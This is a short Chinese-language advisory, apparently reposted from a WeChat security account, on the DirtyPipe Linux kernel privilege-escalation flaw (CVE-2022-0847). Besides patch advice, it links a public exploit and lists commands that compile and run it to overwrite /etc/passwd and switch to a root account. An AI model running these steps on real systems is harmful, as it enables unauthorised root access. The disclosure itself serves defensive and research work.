影响范围
Linux kernel 5.8 later
漏洞类型
本地权限提升
利用条件
影响范围应用
漏洞概述
2022年3月7日,国外安全研究人员马克斯·凯勒曼在其博客中披露了一处存在于Linux内核中的本地提权漏洞,该漏洞允许非特权用户通过注入和覆盖任意只读文件中的数据(例如:/etc/passwd等),攻击者可以利用该特性从而实现权限提升,漏洞编号为CVE-2022-0847,该漏洞CVSS评分:7.8,危害等级:高危
漏洞复现
测试环境:
漏洞EXP:https://github.com/Al1ex/CVE-2022-0847
cp /etc/passwd /tmp/passwd.bak
gcc exp.c -o exp
./exp /etc/passwd 1 ootz:
su rootz
id
安全建议
升级内核版本至Linux Kernel 5.16.11, 5.15.25, 5.10.102
参考链接
https://dirtypipe.cm4all.com/
--------------------------------------------------------------
相关推荐:
https://github.com/Al1ex/LinuxEelvation
https://github.com/Al1ex/WindowsElevation
原文始发于微信公众号(七芒星实验室):CVE-2022-0847:DirtyPipe本地提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论